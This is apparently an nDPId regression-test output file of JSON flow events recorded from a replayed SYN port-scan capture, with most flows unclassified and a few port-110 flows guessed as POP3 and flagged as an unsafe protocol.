+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1609,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8290,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1609,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8290,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":377,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":99,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":377,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":99,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8291,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8291,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":578,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8292,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":578,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8292,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1588,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":100,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1588,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":407,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":99,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":407,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":99,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8291,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8291,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1662,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":100,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1662,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":642,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059517,"flow_last_seen":1278275059517,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8292,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":642,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059517,"flow_last_seen":1278275059517,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8292,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":918,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":14441,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":918,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":14441,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":979,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":14441,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":979,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":14441,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1248,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":106,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1248,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":106,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058031,"flow_last_seen":1278275058031,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":14442,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058031,"flow_last_seen":1278275058031,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":14442,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1312,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":106,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1312,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":106,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":14442,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":14442,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8300,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8300,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":763,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":109,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":763,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":109,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":284,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8300,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":284,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8300,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":834,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":109,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":834,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":109,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00790{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057677,"flow_last_seen":1278275057677,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":110,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"POP3","breed":"Unsafe","category":"Email"},"pop": {"user":"","password":""}} +00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057677,"flow_last_seen":1278275057677,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":110,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00790{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":110,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe 
Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"POP3","breed":"Unsafe","category":"Email"},"pop": {"user":"","password":""}} +00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":110,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00591{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":111,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1792,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2160,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1792,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2160,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 